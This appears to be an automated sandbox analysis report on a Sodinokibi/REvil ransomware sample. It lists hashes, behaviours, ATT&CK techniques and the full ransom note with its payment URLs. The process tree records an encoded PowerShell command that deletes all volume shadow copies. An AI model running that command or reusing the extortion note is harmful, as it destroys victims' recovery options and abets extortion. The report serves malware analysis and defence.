Analysis

  • max time kernel
    145s
  • max time network
    184s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:07

General

  • Target

    4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe

  • Size

    114KB

  • MD5

    004fe16edb1a1eb697a4809ea6f379cf

  • SHA1

    55b75de0adb55d022d9f8653eb7c84a7a0be4a16

  • SHA256

    4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9

  • SHA512

    1645e4095d6e1e959bc93e68ca69ad8ad5c80c5538c4ff680e12140924c6a16a99e29b636beed92f3b20db84aeb8eaca32b00bdeb58fcd0a34c05d2bfc63ce1b

Malware Config

Extracted

Path

C:\031v3d378i-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 031v3d378i. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FF394E98916B202E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FF394E98916B202E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Gw48uOnkdl+sTlBngiyRWhHBJ0bT8mpvwSXojBjN27rx+MXe9xDvq32NFCqRQ7EV h3FeTtAnj4W+KHlCMYX9aGbjl5eH5d+Kil6cDXAUfwj/SS7gE3mrcFU8Urh0vr0g wAewzKO3W14UfWv8ptQ4/Orzo4lsHgvY/tLYUAAVBqAuGqn7JYgD+Om4Fpbgsavs Sh69F8zPIcXcmfW3Mjrj6WwWJbLdsA+NeLhH0gvGms4NWwSIvyLN85+BhK+2a2yZ X0ijnqogypssmzY4cHN5td9ktm1L7idI/lYw4aWELE2oBnMwxFGpDJXlwyxzS1PW ohoFC+02FP/S25QhkOfFxtIaywfiCgagJ/XUY7i3bMjbjZv7BGht1VV/4PfHvqUw CeesTheCsCzRT3z1ZIaVgAulYOnhJUbqAJafb62gqg0peOI1H5hqSkNTEERvOdJ7 1FCNAYHiA4/SA+eHZx4Jy/I4T37oEqVGkxNU9HxfXeaOWJ5blZvRlnZVhl37jpEh c0zJuzp/BqO7rBobz8hh8q6BSmKiQ0kwbpZKX8aOYO/81Irq9MnFKw03sWdtj+N1 BDBR8qPYNErWkwzTlmkCx/4dn06Y4/14dqF/a1RikzcH312/v1Lx3SRq0Knof5YB TdSrnMcs+Cut09DHBQG7ts4wi9XAKpTrGJCiKh0x5DfiTtY7EYk3YYXVl0CvhIAd 7WTYHh1Y0h70MTb4Wul4O2EXOh6sRT5dwsRv+F+6fwcwCz0DyjQzZDCfJYwrjl/z us/k7m8SyxMdLNvpXwptMJDB15lKx4vsgCwFmlZvUbfPr1Ywndiyl5cEekwHft0w Sp1vxFwLrW/KOEEvrsKtF+zJA7FL71+RuFTOB3gXf4khW881Cao5/YcbHmsKry4j QWwA/n8hslk2PoO3ytiinSAoNOfYyRMPJHEmkICqzoglxQbTTpsULa94hQZYBAbO eMQukkcE309qW2lsMZJxvDpuTNDJexOH9ksoB2OwLgFSWstQs2AGKZwh5mqn95Py oB/TUfBEZ2h6ktuqX7JG+MOjyO7B2ezSD3Sp4iJGtM+BSfO7Wo/Ws1CUlkJXJDgU zwLiJA3/HunVPapPekpHOSTcoiNRRSnGQi7EJywKs3c1iwbrQfKkKUQmspVzLgsA hWgmijaIu88vRpabtTEYjRtsa3Zf5neY6dzHJcvwiEyLhCJQb7C1OTfDMQl0lpwv h/L3a9m3R+eWqn73WDj6FX4jl1f/YCOUynp/qAHGnANLV3Ty1CCmQ1FHkYP/LtpU KHDPb0ddzT2Cqv/2juyYSakZOCZqCfFTBLJCww== Extension name: 031v3d378i ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FF394E98916B202E

http://decryptor.cc/FF394E98916B202E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
    "C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:616
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1492

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/268-55-0x0000000076141000-0x0000000076143000-memory.dmp
      Filesize

      8KB

    • memory/572-56-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
      Filesize

      8KB

    • memory/572-57-0x0000000002380000-0x0000000002382000-memory.dmp
      Filesize

      8KB

    • memory/572-60-0x0000000002384000-0x0000000002387000-memory.dmp
      Filesize

      12KB

    • memory/572-59-0x0000000002382000-0x0000000002384000-memory.dmp
      Filesize

      8KB

    • memory/572-58-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp
      Filesize

      11.4MB

    • memory/572-61-0x000000001B850000-0x000000001BB4F000-memory.dmp
      Filesize

      3.0MB

    • memory/572-62-0x000000000238B000-0x00000000023AA000-memory.dmp
      Filesize

      124KB